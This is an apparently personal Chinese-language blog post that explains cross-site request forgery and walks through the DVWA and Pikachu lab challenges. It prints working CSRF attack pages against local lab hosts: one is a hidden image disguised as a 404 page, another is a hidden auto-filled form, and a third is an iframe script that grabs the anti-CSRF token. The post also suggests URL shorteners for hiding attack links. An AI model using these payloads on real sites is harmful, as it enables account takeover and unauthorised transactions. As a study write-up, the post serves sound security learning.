<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.7.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.7.0" type="image/png" sizes="32x32"><meta name="description" content="Cross-site request forgery:跨站请求伪造">
<meta property="og:type" content="article">
<meta property="og:title" content="CSRF">
<meta property="og:url" content="https://hyggevv.github.io/2022/12/22/CSRF/index.html">
<meta property="og:site_name" content="hey&#39;s blog">
<meta property="og:description" content="Cross-site request forgery:跨站请求伪造">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/1.jpg">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/2.jpg">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/3.jpeg">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/4.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/5.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/6.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/7.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/8.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/9.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/10.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/11.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/12.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/13.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/14.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/15.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/16.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/17.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/18.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/27.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/20.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/21.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/22.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/23.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/24.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/25.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/26.png">
<meta property="og:image" content="https://hyggevv.github.io/2022/12/22/CSRF/19.png">
<meta property="article:published_time" content="2022-12-22T15:06:07.000Z">
<meta property="article:modified_time" content="2023-04-25T12:36:58.072Z">
<meta property="article:author" content="hey">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hyggevv.github.io/2022/12/22/CSRF/1.jpg"><title>CSRF | hey's blog</title><link ref="canonical" href="https://hyggevv.github.io/2022/12/22/CSRF/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.7.0"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"carbon","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: true,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.2"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Tags</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/about/"><span class="header-nav-menu-item__icon"><i class="fas fa-user"></i></span><span class="header-nav-menu-item__text">About</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/read/"><span class="header-nav-menu-item__icon"><i class="fas fa-book"></i></span><span class="header-nav-menu-item__text">menu.read</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">hey's blog</div><div class="header-banner-info__subtitle">天气转晴太阳崭新我在前进</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">CSRF</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2022-12-22</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2023-04-25</span></span><span class="post-meta-item post-meta-item--visitors"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">Visited</span><span class="post-meta-item__value" id="busuanzi_value_page_pv"></span></span></div></header><div class="post-body">
        <h2 id="CSRF-Cross-Site-Request-Forgery">
          <a href="#CSRF-Cross-Site-Request-Forgery" class="heading-link"><i class="fas fa-link"></i></a><a href="#CSRF-Cross-Site-Request-Forgery" class="headerlink" title="CSRF:Cross Site Request Forgery"></a>CSRF:Cross Site Request Forgery</h2>
      
        <h2 id="CSRF基本概念：">
          <a href="#CSRF基本概念：" class="heading-link"><i class="fas fa-link"></i></a><a href="#CSRF基本概念：" class="headerlink" title="CSRF基本概念："></a>CSRF基本概念：</h2>
      <p>CSRF(Cross-site request forgery)跨站请求伪造，黑客利用已经登录的用户，诱使其访问或者登录某个早已构造好的恶意链接或者页面，然后在用户毫不知情的情况下，以用户的名义完成了非用户本意的非法操作。这种攻击我们也被称为”One Click Attack”或者SessionRiding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用行为。与XSS攻击相比，CSRF攻击往往不大流行,因此对其进行防范的资源也相当稀少和难以防范，所以被认为比XSS更具危险性。<br><img src="/2022/12/22/CSRF/1.jpg"></p>

        <h2 id="CSRF攻击过程：">
          <a href="#CSRF攻击过程：" class="heading-link"><i class="fas fa-link"></i></a><a href="#CSRF攻击过程：" class="headerlink" title="CSRF攻击过程："></a>CSRF攻击过程：</h2>
      <p>1.用户C打开浏览器，访问受信任网站A，输入用户名和密码请求登录网站A；<br>2.在用户信息用过验证后，网站A产生Cookie信息并返回给浏览器，此时用户登录网站A成功，可以正常发送请求到网站A；<br>3.用户未退出网站A之前，在同一浏览器中打开一个TAB页访问网站B；<br>4.网站B接受到用户请求后，返回一些攻击性代码，并发出一个请求要求访问第三方站点A；<br>5.浏览器在接收到这些攻击性代码后，根据网站B的请求，在用户不知情的情况下携带Cookie信息，向网站A发出请求。网站A并不知道该请求其实是由B发起的，所以会根据用户C的Cookie信息以C的权限处理该请求，导致来自网站B的恶意代码被执行。<br><img src="/2022/12/22/CSRF/2.jpg"></p>

        <h2 id="CSRF攻击例子">
          <a href="#CSRF攻击例子" class="heading-link"><i class="fas fa-link"></i></a><a href="#CSRF攻击例子" class="headerlink" title="CSRF攻击例子"></a>CSRF攻击例子</h2>
      <p>正常登入：<br>受害者张三在银行有一笔存款，通过对银行的网站发送请求<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://bank.example/withdraw?account=%E5%BC%A0%E4%B8%89&amount=1000000&for=%E7%BD%97%E8%80%81%E5%B8%88">http://bank.example/withdraw?account=张三&amp;amount=1000000&amp;for=罗老师</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> 可以使张三把1000000的存款转到罗老师的账号下。通常情况下，该请求发送到网站后，服务器会先验证该请求是否来自一个合法的 session，并且该session 的用户张三已经成功登陆。<br>黑客李四自己在该银行也有账户，他知道上文中的URL可以把钱进行转帐操作。李四可以自己发送一个请求给银行：<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://bank.example/withdraw?account=%E5%BC%A0%E4%B8%89&amount=1000000&for=%E6%9D%8E%E5%9B%9B">http://bank.example/withdraw?account=张三&amp;amount=1000000&amp;for=李四</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> 但是这个请求来自 李四 而非 张三，他不能通过安全认证，因此该请求不会起作用。<br>构造恶意链接或页面进行CSRF攻击：<br>这时，李四想到使用CSRF的攻击方式，他先自己做一个网站，在网站中放入如下代码： src&#x3D;”<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://bank.example/withdraw?account=%E5%BC%A0%E4%B8%89&amount=1000000&for=%E6%9D%8E%E5%9B%9B%E2%80%9D">http://bank.example/withdraw?account=张三&amp;amount=1000000&amp;for=李四”</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> 并且通过广告等诱使张三 来访问他的网站。当张三访问该网站时，上述 url 就会从张三的浏览器发向银行，而这个请求会附带张三浏览器中的cookie一起发向银行服务器。大多数情况下，该请求会失败，因为他要求张三的认证信息。但是，如果张三当时恰巧刚访问他的银行后不久，他的浏览器与银行网站之间的session尚未过期，浏览器的cookie之中含有张三的认证信息。这时，悲剧发生了，这个url请求就会得到响应，钱将从张三的账号转移到李四的账号，而张三当时毫不知情。等以后张三发现账户钱少了，即使他去银行查询日志，他也只能发现确实有一个来自于他本人的合法请求转移了资金，没有任何被攻击的痕迹。而李四则可以拿到钱后逍遥法外。<br><img src="/2022/12/22/CSRF/3.jpeg"></p>

        <h2 id="CSRF漏洞检测">
          <a href="#CSRF漏洞检测" class="heading-link"><i class="fas fa-link"></i></a><a href="#CSRF漏洞检测" class="headerlink" title="CSRF漏洞检测"></a>CSRF漏洞检测</h2>
      <p>1.检测CSRF漏洞是一项比较繁琐的工作，最简单的方法就是抓取一个正常请求的数据包，去掉Referer字段后再重新提交，如果该提交还有效，那么基本上可以确定存在CSRF漏洞。<br>2.随着对CSRF漏洞研究的不断深入，不断涌现出一些专门针对CSRF漏洞检测的工具，若CSRFTester，CSRF Request Builder等。</p>

        <h2 id="DVMA-CSRF">
          <a href="#DVMA-CSRF" class="heading-link"><i class="fas fa-link"></i></a><a href="#DVMA-CSRF" class="headerlink" title="DVMA-CSRF"></a>DVMA-CSRF</h2>
      
        <h2 id="LOW">
          <a href="#LOW" class="heading-link"><i class="fas fa-link"></i></a><a href="#LOW" class="headerlink" title="LOW"></a>LOW</h2>
      <p><img src="/2022/12/22/CSRF/4.png"><br>由源码可知后台对我们输入的$pass_new和$pass_cnof进行一个判断；若是两者相等，则先对其转义特殊字符后，进行一个MD5加密；接下来便是更改密码的操作；将$pass_new插入数据库中。<br>1.构造链接进行攻击<br><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://127.0.0.1/DVWA-master/vulnerabilities/csrf?pass_new=shell&pass_conf=shell&Change=Change#">http://127.0.0.1/DVWA-master/vulnerabilities/csrf?pass_new=shell&amp;pass_conf=shell&amp;Change=Change#</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span><br>此时我们在已经登入的情况下访问这个链接，会发现我们的密码已经被改掉了且返回登入界面已经发现原密码失效<br><img src="/2022/12/22/CSRF/5.png"><br><img src="/2022/12/22/CSRF/6.png"><br>但是当受害者点击了这个链接，他的密码就会被改成shell;这种攻击显得有些拙劣，链接一眼就能看出来是改密码的，而且受害者点了链接之后看到这个页面就会知道自己的密码被篡改了。<br>所以此时我们需要对我们的链接进行一些处理；让它看上去正常一点；在这里我们使用短链接生成器；此时我们可以发现这次的链接已经不像第一个那么明显了。<br><img src="/2022/12/22/CSRF/7.png"><br>虽然利用了短链接隐藏url，但受害者最终还是会看到密码修改成功的页面，所以这种攻击方法也并不高明。<br>2.构造攻击页面:这种方法需要事先在公网上传一个攻击页面，诱骗受害者去访问，真正能够在受害者不知情的情况下完成CSRF攻击。<br>写法一：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">    &lt;title&gt;CSRF&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">    &lt;img src=&quot;http://127.0.0.1:81/DVWA-master/vulnerabilities/csrf/?password_new=wann&amp;password_conf=wann&amp;Change=Change#&quot;border=&quot;0&quot; style=&quot;display:none;&quot;&gt;</span><br><span class="line">&lt;h1&gt;</span><br><span class="line">    404&lt;h1&gt;</span><br><span class="line">       &lt;h2&gt;</span><br><span class="line">           file not found.&lt;h2&gt;</span><br><span class="line">                &lt;body&gt;</span><br><span class="line">           &lt;/body&gt;</span><br><span class="line">           &lt;/html&gt;</span><br><span class="line"></span><br><span class="line">注：此处img中的src跳转必须是get请求下的csrf才可以发生。</span><br></pre></td></tr></table></div></figure>

<p>写法二：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;html&gt;</span><br><span class="line">  &lt;body&gt;</span><br><span class="line">    &lt;form action=&quot;http://127.0.0.1/DVWA-master/vulnerabilities/csrf/&quot;&gt;</span><br><span class="line">      &lt;input type=&quot;hidden&quot; name=&quot;password_new&quot; value=&quot;wann&quot;/&gt;</span><br><span class="line">      &lt;input type=&quot;hidden&quot; name=&quot;password_conf&quot; value=&quot;wann&quot;/&gt;</span><br><span class="line">      &lt;input type=&quot;hidden&quot; name =&quot;Change&quot; value=&quot;Change&quot; /&gt;</span><br><span class="line">      &lt;input type=&quot;submit&quot; value=&quot;Click Me&quot;&gt;</span><br><span class="line">    &lt;/form&gt;</span><br><span class="line">  &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></div></figure>
<p>在我们点击之后发现密码确实是已经被改了<br><img src="/2022/12/22/CSRF/8.png"><br>注：如果用户登录（本地DVWA）是使用Firefox，而双击访问test.html黑客网站是使用IE，那么密码是不会被修改的，要同一个浏览器密码才有效。这其实就是真实攻击时，用户登录了DVWA，在没有退出DVWA（或身份认证信息还未过期时）打开了新的（hack设计好的修改DVWA登录密码的链接），就会把DVWA的密码改了。<br>3.携带图片</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> &lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;a href=&quot;http://127.0.0.1/dvwa-master/vulnerabilities/csrf/?password_new=wann&amp;password_conf=wann&amp;Change=Change#&quot;&gt;</span><br><span class="line">    &lt;img src=&quot;http://127.0.0.1/D:/csrf.jpg&quot; border=&quot;0&quot; width=&quot;220&quot; height=&quot;100&quot;&gt;</span><br><span class="line">&lt;/a&gt; </span><br><span class="line">&lt;/body&gt; </span><br><span class="line">&lt;/html&gt;</span><br><span class="line">/*href后的内容为恶意链接；src后的内容为图片存在的根路径。*/</span><br></pre></td></tr></table></div></figure>


        <h2 id="Medium">
          <a href="#Medium" class="heading-link"><i class="fas fa-link"></i></a><a href="#Medium" class="headerlink" title="Medium"></a>Medium</h2>
      <p><img src="/2022/12/22/CSRF/9.png"><br>spripos(string,find[,start])：从start位置开始查找find中string第一次出现的位置<br>(3)$SERVER[‘HTTP_REFERER’]链接到当前页面的前一页面的 URL 地址。<br>(4)$SERVER[‘SERVER_NAME’] #当前运行脚本所在服务器主机的名称。</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">host:指定要请求的资源的IP（或者域名）+端口号。没有端口号则是默认的。</span><br><span class="line">referer:告诉服务器从哪里来的，包括协议、域名、端口、路径和参数。</span><br><span class="line">所以这里验证的是前一页的地址中有没有要访问的域名，所以需要把访问的文件名字改成是host的name（IP（或者域名））。</span><br><span class="line">也就是refer中必须包含主机名(host），即把前面的攻击页面命名为 IP地址.html（页面被放置在攻击者的服务器中）</span><br></pre></td></tr></table></div></figure>
<p>可以从源码中得知后台查询referer中是否含有($SERVER[‘SERVER_NAME’]即为http包头的Host参数，及要访问的主机名)<br>此时我们先抓个包试试看<br><img src="/2022/12/22/CSRF/10.png"><br>此时发现了这个Referer: <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://127.0.0.1/DVWA-master/security.php">http://127.0.0.1/DVWA-master/security.php</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span><br>此时我们依旧可以利用low等级里面的那个链接，在本地进行访问，然后挂代理进行抓包，在请求头里面添加上面那个referer值；然后放包；这样我们的密码就可以被更改成功。但是我们在进行实际攻击时，是没有办法进行抓受害者的包然后进行更改referer值的。所以这个方法在实战中会十分蹩脚(上面这个是我自己的理解，若是有不对之处，请斧正)<br>此时因为题目要求要包含目标的主机名；所以我们可以利用一系列漏洞进行进行获取目标主机名；然后将我们的恶意文件命名为：目标主机名.html 这样当目标主机访问我们这个恶意文件时便可以进行更改密码的操作；因为该操作需要两台主机同时进<br>行；所以这里就简述一下流程<br><img src="/2022/12/22/CSRF/11.png"></p>

        <h2 id="High">
          <a href="#High" class="heading-link"><i class="fas fa-link"></i></a><a href="#High" class="headerlink" title="High"></a>High</h2>
      <p><img src="/2022/12/22/CSRF/12.png"><br>这部分源码最主要的就是检查了token<br><img src="/2022/12/22/CSRF/13.png"><br>用户每次访问改密页面时，服务器会返回一个随机的token，向服务器发起请求时，需要提交token参数，而服务器在收到请求时，会优先检查token，只有token正确，才会处理客户端的请求。<br>方法一：试着去构造一个攻击页面，将其放置在攻击者的服务器，引诱受害者访问，从而完成CSRF攻击，下面是代码；</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type=&quot;text/javascript&quot;&gt; </span><br><span class="line">    function attack() &#123;</span><br><span class="line"> </span><br><span class="line">   document.getElementsByName(&#x27;user_token&#x27;)[0].value=document.getElementById(&quot;hack&quot;).contentWindow.document.getElementsByName(&#x27;user_token&#x27;)[0].value;</span><br><span class="line">   document.getElementById(&quot;transfer&quot;).submit();   &#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;iframe src=&quot;http://192.168.153.130/dvwa/vulnerabilities/csrf&quot; id=&quot;hack&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;</span><br><span class="line">&lt;/iframe&gt;</span><br><span class="line"> </span><br><span class="line">&lt;body οnlοad=&quot;attack()&quot;&gt;</span><br><span class="line"> &lt;form method=&quot;GET&quot; id=&quot;transfer&quot; action=&quot;http://192.168.153.130/dvwa/vulnerabilities/csrf&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;password_new&quot; value=&quot;password&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;password_conf&quot; value=&quot;password&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;user_token&quot; value=&quot;&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;Change&quot; value=&quot;Change&quot;&gt;</span><br><span class="line"> &lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br></pre></td></tr></table></div></figure>
<p>然而理想与现实的差距是巨大的，这里牵扯到了跨域问题，而现在的浏览器是不允许跨域请求的。这里简单解释下跨域，我们的框架iframe访问的地址是<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://192.168.67.143/dvwa/vulnerabilities/csrf">http://192.168.67.143/dvwa/vulnerabilities/csrf</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> 位于服务器192.168.67.143上，而我们的攻击页面位于黑客服务器192.168.67.140上，两者的域名不同，域名B下的所有页面都不允许主动获取域名A下的页面内容，除非域名A下的页面主动发送信息给域名B的页面，所以我们的攻击脚本是不可能取到改密界面中的user_token。<br>由于跨域是不能实现的，所以现在要想进行CSRF攻击就必须获取到用户的token，而要想获取到 token 就必须利用用户的 cookie 值去访问修改密码的页面，然后截取服务器返回的token值。然后再利用CSRF漏洞构造URL进行密码的修改。<br>所以我们要将攻击代码注入到目标服务器192.168.67.143中，才有可能完成攻击。下面利用High级别的XSS漏洞协助获取Anti-CSRF token（因为这里的XSS注入有长度限制，不能够注入完整的攻击脚本，所以只获取Anti-CSRF token）。<br>注：这里还没有学到XSS；所以先放一下，回头来补。<br>方法二：<br>利用burpsuite中的CSRF Token Tracker绕过token验证插件：<br><img src="/2022/12/22/CSRF/14.png"><br><img src="/2022/12/22/CSRF/15.png"><br><img src="/2022/12/22/CSRF/16.png"><br><img src="/2022/12/22/CSRF/17.png"></p>

        <h2 id="Impossible">
          <a href="#Impossible" class="heading-link"><i class="fas fa-link"></i></a><a href="#Impossible" class="headerlink" title="Impossible"></a>Impossible</h2>
      <p><img src="/2022/12/22/CSRF/18.png"><br>可以看到，Impossible级别的代码利用PDO技术防御SQL注入，至于防护CSRF，则要求用户输入原始密码，攻击者在不知道原始密码的情况下，无论如何都无法进行CSRF攻击。</p>

        <h2 id="Pikachu">
          <a href="#Pikachu" class="heading-link"><i class="fas fa-link"></i></a><a href="#Pikachu" class="headerlink" title="Pikachu"></a>Pikachu</h2>
      
        <h2 id="CSRF-GET">
          <a href="#CSRF-GET" class="heading-link"><i class="fas fa-link"></i></a><a href="#CSRF-GET" class="headerlink" title="CSRF(GET)"></a><img src="/2022/12/22/CSRF/27.png"><br>CSRF(GET)</h2>
      <p>此时登入后发现了这个界面；此时尝试对用户信息进行更改<br><img src="/2022/12/22/CSRF/20.png"><br>使用bp拦截更改消息<br><img src="/2022/12/22/CSRF/21.png"><br>然后进行咱们要修改的值，接着利用短链接进行伪造；然后我们模仿该用户点击该链接，此时会发现我们的数据已经被更改<br><img src="/2022/12/22/CSRF/22.png"></p>

        <h2 id="CSRF-POST">
          <a href="#CSRF-POST" class="heading-link"><i class="fas fa-link"></i></a><a href="#CSRF-POST" class="headerlink" title="CSRF(POST)"></a>CSRF(POST)</h2>
      <p>此时登入后发现了这个界面；此时尝试对用户信息进行更改<br><img src="/2022/12/22/CSRF/23.png"><br>因为此时为POST提交方式；所有还是打开bp然后进行抓包点击Engagement tools——Generate CSRF PoC进行构造<br><img src="/2022/12/22/CSRF/24.png"><br>接着模仿受害者访问攻击者传来的页面；此时发现信息已经被修改<br><img src="/2022/12/22/CSRF/25.png"></p>

        <h2 id="CSRF-Token">
          <a href="#CSRF-Token" class="heading-link"><i class="fas fa-link"></i></a><a href="#CSRF-Token" class="headerlink" title="CSRF(Token)"></a>CSRF(Token)</h2>
      <p><img src="/2022/12/22/CSRF/26.png"><br>查看源码，发现它会验证我们每次提交的Token；CSRF的主要问题是敏感操作的连接容易被伪造，如何让这个链接不被伪造？<br>每次请求增加一个随机码，后台每次对这个随机码进行验证。</p>

        <h2 id="后记">
          <a href="#后记" class="heading-link"><i class="fas fa-link"></i></a><a href="#后记" class="headerlink" title="后记"></a>后记</h2>
      <p>第一次接触CSRF还是有点手忙脚乱；通过DVWA进行学习CSRF后找了Pikachu进行练习了一下；巩固了一下基础知识。通过DVWA也是对CSRF有了点感觉；自己觉得对于跨站请求伪造的学习还是停留在理论的学习；实战经历还是偏少。<br><img src="/2022/12/22/CSRF/19.png"></p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="https://hyggevv.github.io">hey</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="https://hyggevv.github.io/2022/12/22/CSRF/">https://hyggevv.github.io/2022/12/22/CSRF/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2022/12/24/HTTP/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">HTTP:Hypertext Transfer Protocol</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2022/12/21/DVWA/"><span class="paginator-prev__text">DVWA</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF-Cross-Site-Request-Forgery"><span class="toc-number">1.</span> <span class="toc-text">
          CSRF:Cross Site Request Forgery</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">
          CSRF基本概念：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF%E6%94%BB%E5%87%BB%E8%BF%87%E7%A8%8B%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">
          CSRF攻击过程：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF%E6%94%BB%E5%87%BB%E4%BE%8B%E5%AD%90"><span class="toc-number">4.</span> <span class="toc-text">
          CSRF攻击例子</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8B"><span class="toc-number">5.</span> <span class="toc-text">
          CSRF漏洞检测</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DVMA-CSRF"><span class="toc-number">6.</span> <span class="toc-text">
          DVMA-CSRF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#LOW"><span class="toc-number">7.</span> <span class="toc-text">
          LOW</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Medium"><span class="toc-number">8.</span> <span class="toc-text">
          Medium</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#High"><span class="toc-number">9.</span> <span class="toc-text">
          High</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Impossible"><span class="toc-number">10.</span> <span class="toc-text">
